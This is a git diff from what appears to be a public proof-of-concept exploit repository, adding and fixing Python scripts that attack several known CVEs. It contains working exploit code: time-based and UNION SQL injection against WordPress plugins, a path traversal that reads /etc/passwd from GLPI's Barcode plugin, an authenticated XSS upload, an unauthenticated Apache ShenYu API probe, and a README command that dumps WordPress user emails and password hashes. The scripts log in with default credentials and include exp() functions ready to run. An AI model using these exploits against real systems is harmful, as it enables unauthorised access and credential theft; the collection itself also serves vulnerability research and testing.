diff --git a/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py b/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
index b57b70aaa..c8a05ab62 100644
--- a/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
+++ b/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
@@ -1,5 +1,5 @@
import requests
-
+import time
# Vuln Base Info
def info():
@@ -29,7 +29,20 @@ def info():
# Vender Fingerprint
def fingerprint(url):
- return True
+ username = "admin"
+ password = "admin"
+ s = requests.Session()
+ path = """/wp-login.php"""
+ method = "POST"
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
+ headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
+ resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+ resp1 = s.get(url+"/wp-admin/admin.php?page=zm_gallery")
+ if "ZM Gallery Plugin" in resp1.text:
+ return True
+ else:
+ return False
# Proof of Concept
def poc(url):
@@ -47,19 +60,15 @@ def poc(url):
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc"""
+ path = """/wp-admin/admin.php?page=zm_gallery&orderby=1%20AND%20(SELECT%204291%20FROM%20(SELECT(SLEEP(3)))cxXu)&order=desc"""
method = "GET"
data = """"""
headers = {}
+ time1 = time.time()
resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ time2 = time.time()
- path = """/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc"""
- method = "GET"
- data = """"""
- headers = {}
- resp2 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
-
- if "| " in resp1.text and " | " not in resp2.text:
+ if "ZM Gallery Plugin" in resp1.text and 3 <= (time2-time1) < 10:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
diff --git a/2016/CVE-2016-10940/vultarget/1.png b/2016/CVE-2016-10940/vultarget/1.png
index eb621f05e..c291a020c 100644
Binary files a/2016/CVE-2016-10940/vultarget/1.png and b/2016/CVE-2016-10940/vultarget/1.png differ
diff --git a/2016/CVE-2016-10940/vultarget/README.md b/2016/CVE-2016-10940/vultarget/README.md
index 0bee32964..775b26b87 100644
--- a/2016/CVE-2016-10940/vultarget/README.md
+++ b/2016/CVE-2016-10940/vultarget/README.md
@@ -15,6 +15,6 @@ Username/Password: wordpress/wordpress
## Poc
-[poc](poc/nuclei/CVE-2016-10940.yaml)
+[poc](../poc/pocsploit/CVE-2016-10940.py)
diff --git a/2021/CVE-2021-24750/poc/pocsploit/CVE-2021-24750.py b/2021/CVE-2021-24750/poc/pocsploit/CVE-2021-24750.py
index 29d2434ca..2fe9e63e5 100644
--- a/2021/CVE-2021-24750/poc/pocsploit/CVE-2021-24750.py
+++ b/2021/CVE-2021-24750/poc/pocsploit/CVE-2021-24750.py
@@ -19,8 +19,7 @@ def info():
"cwe-id": "CWE-89"
},
"metadata":{
- "vuln-target": "",
-
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24750/vultarget"
},
"tags": ["cve", "cve2021", "sqli", "wp", "wordpress", "wp-plugin", "authenticated"],
}
@@ -33,6 +32,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,15 +41,14 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
- resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False)
- path = """/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D"""
- method = "CVE-2021-24750'),4--%20%22%7D"
- data = """"""
+ path = "/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D"
+ method = "GET"
headers = {}
- resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp1 = s.request(method=method,url=url+path,headers=headers,timeout=10,verify=False)
if ("""266f89556d2b38ff067b580fb305c522""" in resp1.text) and (resp1.status_code == 200):
result["success"] = True
diff --git a/2021/CVE-2021-24750/vultarget/1.png b/2021/CVE-2021-24750/vultarget/1.png
new file mode 100644
index 000000000..0f126c960
Binary files /dev/null and b/2021/CVE-2021-24750/vultarget/1.png differ
diff --git a/2021/CVE-2021-24750/vultarget/README.md b/2021/CVE-2021-24750/vultarget/README.md
index 9cf589ff6..67cddd580 100644
--- a/2021/CVE-2021-24750/vultarget/README.md
+++ b/2021/CVE-2021-24750/vultarget/README.md
@@ -10,4 +10,10 @@ docker-compose run --rm wp-cli install-wp
* Start the exploit script with an sql query that gets users emails and passwords
```
python3 exploit.py -C 'union select 1,1,user_email,user_pass from wp_users -- '
-```
\ No newline at end of file
+```
+
+## Poc
+
+
+
+[Poc](../poc/pocsploit/CVE-2021-24750.py)
\ No newline at end of file
diff --git a/2021/CVE-2021-43778/poc/pocsploit/CVE-2021-43778.py b/2021/CVE-2021-43778/poc/pocsploit/CVE-2021-43778.py
new file mode 100644
index 000000000..a003877da
--- /dev/null
+++ b/2021/CVE-2021-43778/poc/pocsploit/CVE-2021-43778.py
@@ -0,0 +1,70 @@
+import requests
+
+
+# Vuln Base Info
+def info():
+ return {
+ "author": "cckuailong",
+ "name": '''GLPI plugin Barcode < 2.6.1 path traversal vulnerability''',
+ "description": '''Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file.''',
+ "severity": "critical",
+ "references": [
+ "https://github.com/AK-blank/CVE-2021-43778",
+ "https://nvd.nist.gov/vuln/detail/CVE-2021-43778"
+ ],
+ "classification": {
+ "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
+ "cvss-score": "9.1",
+ "cve-id": "CVE-2021-43778",
+ "cwe-id": "CWE-22"
+ },
+ "metadata":{
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-43778/vultarget"
+ },
+ "tags": ["glpi", "cve", "cve2021", "lfi"],
+ }
+
+
+# Vender Fingerprint
+def fingerprint(url):
+ resp = requests.get(url+"/glpi/", timeout=10, verify=False, allow_redirects=False)
+ if "GLPI - " in resp.text and "/pics/login_logo_glpi.png" in resp.text:
+ return True
+ else:
+ return False
+
+# Proof of Concept
+def poc(url):
+ result = {}
+ try:
+ url = format_url(url)
+
+ path = "/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"
+ method = "GET"
+ headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36"}
+ resp = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+ if "root:" in resp.text and ":0:0" in resp.text and resp.status_code == 200:
+ result["success"] = True
+ result["info"] = info()
+ result["payload"] = url+path
+
+ except:
+ result["success"] = False
+
+ return result
+
+
+# Exploit, can be same with poc()
+def exp(url):
+ return poc(url)
+
+
+# Utils
+def format_url(url):
+ url = url.strip()
+ if not ( url.startswith('http://') or url.startswith('https://') ):
+ url = 'http://' + url
+ url = url.rstrip('/')
+
+ return url
\ No newline at end of file
diff --git a/2021/CVE-2021-43778/poc/pocsploit/wait_to_be_added b/2021/CVE-2021-43778/poc/pocsploit/wait_to_be_added
deleted file mode 100644
index 08b178987..000000000
--- a/2021/CVE-2021-43778/poc/pocsploit/wait_to_be_added
+++ /dev/null
@@ -1 +0,0 @@
-Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-43778/vultarget/README.md b/2021/CVE-2021-43778/vultarget/README.md
new file mode 100644
index 000000000..988dcd944
--- /dev/null
+++ b/2021/CVE-2021-43778/vultarget/README.md
@@ -0,0 +1,7 @@
+## Install the glpi
+
+## Copy the vuln plugin to DIR plugins/
+
+## Poc
+
+[Poc](../poc/pocsploit/CVE-2021-43778.py)
\ No newline at end of file
diff --git a/2021/CVE-2021-43778/vultarget/glpi-barcode-2.6.0.tar.bz2 b/2021/CVE-2021-43778/vultarget/glpi-barcode-2.6.0.tar.bz2
new file mode 100644
index 000000000..b92bb161d
Binary files /dev/null and b/2021/CVE-2021-43778/vultarget/glpi-barcode-2.6.0.tar.bz2 differ
diff --git a/2021/CVE-2021-43778/vultarget/wait_to_be_added b/2021/CVE-2021-43778/vultarget/wait_to_be_added
deleted file mode 100644
index ff27e85b6..000000000
--- a/2021/CVE-2021-43778/vultarget/wait_to_be_added
+++ /dev/null
@@ -1 +0,0 @@
-Please contibute to implement this vultarget, thanks!
diff --git a/2021/CVE-2021-46005/poc/pocsploit/CVE-2021-46005.py b/2021/CVE-2021-46005/poc/pocsploit/CVE-2021-46005.py
index a221f567d..59655cac6 100644
--- a/2021/CVE-2021-46005/poc/pocsploit/CVE-2021-46005.py
+++ b/2021/CVE-2021-46005/poc/pocsploit/CVE-2021-46005.py
@@ -19,8 +19,7 @@ def info():
"cwe-id": "CWE-79"
},
"metadata":{
- "vuln-target": "",
-
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-46005/vultarget"
},
"tags": ["cve", "cve2021", "xss", "sourcecodester", "authenticated"],
}
@@ -28,11 +27,17 @@ def info():
# Vender Fingerprint
def fingerprint(url):
- return True
+ resp = requests.get(url, timeout=10, verify=False)
+ if "Car Rental Portal" in resp.text:
+ return True
+ else:
+ return False
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,10 +45,9 @@ def poc(url):
path = """/admin/"""
method = "POST"
- data = """username={{username}}&password={{password}}&login="""
+ data = """username={username}&password={password}&login=""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close'}
- resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
-
+ resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False)
path = """/admin/post-avehical.php"""
method = "POST"
data = """------WebKitFormBoundarypWqYipqU21aYgccv
diff --git a/2021/CVE-2021-46005/vultarget/1.png b/2021/CVE-2021-46005/vultarget/1.png
new file mode 100644
index 000000000..12d6f4ee7
Binary files /dev/null and b/2021/CVE-2021-46005/vultarget/1.png differ
diff --git a/2021/CVE-2021-46005/vultarget/OnlineCarRental/admin/img/vehicleimages/test.png b/2021/CVE-2021-46005/vultarget/OnlineCarRental/admin/img/vehicleimages/test.png
new file mode 100644
index 000000000..e69de29bb
diff --git a/2021/CVE-2021-46005/vultarget/README.md b/2021/CVE-2021-46005/vultarget/README.md
index accaba401..dbe8645a6 100644
--- a/2021/CVE-2021-46005/vultarget/README.md
+++ b/2021/CVE-2021-46005/vultarget/README.md
@@ -123,3 +123,9 @@ Content-Disposition: form-data; name="submit"
4. Open the http://localhost/car-rental/ and our Payload excuted.
+
+## Poc
+
+[Poc](../poc/pocsploit/CVE-2021-46005.py)
+
+
diff --git a/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py b/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py
new file mode 100644
index 000000000..f0bcc70ad
--- /dev/null
+++ b/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py
@@ -0,0 +1,70 @@
+import requests
+
+
+# Vuln Base Info
+def info():
+ return {
+ "author": "cckuailong",
+ "name": '''ShenYu Admin Unauth Access''',
+ "description": '''User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.''',
+ "severity": "medium",
+ "references": [
+ "https://github.com/apache/incubator-shenyu/pull/2462/files",
+ "https://nvd.nist.gov/vuln/detail/CVE-2022-23944"
+ ],
+ "classification": {
+ "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
+ "cvss-score": "9.1",
+ "cve-id": "CVE-2022-23944",
+ "cwe-id": "CWE-306, CWE-862"
+ },
+ "metadata":{
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-23944/vultarget"
+ },
+ "tags": ["shenyu", "unauth" , "apache"],
+ }
+
+
+# Vender Fingerprint
+def fingerprint(url):
+ resp = requests.get(url, timeout=10, verify=False)
+ if "ShenYu Gateway" in resp.text:
+ return True
+ else:
+ return False
+
+# Proof of Concept
+def poc(url):
+ result = {}
+ try:
+ url = format_url(url)
+
+ path = "/plugin"
+ method = "GET"
+ headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36"}
+ resp = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+ if resp.status_code == 200 and '"message":"query success"' in resp.text and '"code":200' in resp.text:
+ result["success"] = True
+ result["info"] = info()
+ result["payload"] = url+path
+
+ except:
+ result["success"] = False
+
+ return result
+
+
+# Exploit, can be same with poc()
+def exp(url):
+ return poc(url)
+
+
+# Utils
+def format_url(url):
+ url = url.strip()
+ if not ( url.startswith('http://') or url.startswith('https://') ):
+ url = 'http://' + url
+ url = url.rstrip('/')
+
+ return url
\ No newline at end of file
diff --git a/2022/CVE-2022-23944/poc/pocsploit/wait_to_be_added b/2022/CVE-2022-23944/poc/pocsploit/wait_to_be_added
deleted file mode 100644
index 08b178987..000000000
--- a/2022/CVE-2022-23944/poc/pocsploit/wait_to_be_added
+++ /dev/null
@@ -1 +0,0 @@
-Please contibute to implement this poc / vultarget, thanks!
diff --git a/2022/CVE-2022-23944/vultarget/3.png b/2022/CVE-2022-23944/vultarget/3.png
new file mode 100644
index 000000000..8b9d050e7
Binary files /dev/null and b/2022/CVE-2022-23944/vultarget/3.png differ
diff --git a/2022/CVE-2022-23944/vultarget/README.md b/2022/CVE-2022-23944/vultarget/README.md
index d245dfacf..bd7973eaa 100644
--- a/2022/CVE-2022-23944/vultarget/README.md
+++ b/2022/CVE-2022-23944/vultarget/README.md
@@ -17,3 +17,7 @@ vuln app:
version >= 4.2, return 600
+
+[Poc](../poc/pocsploit/CVE-2022-23944.py)
+
+
\ No newline at end of file
|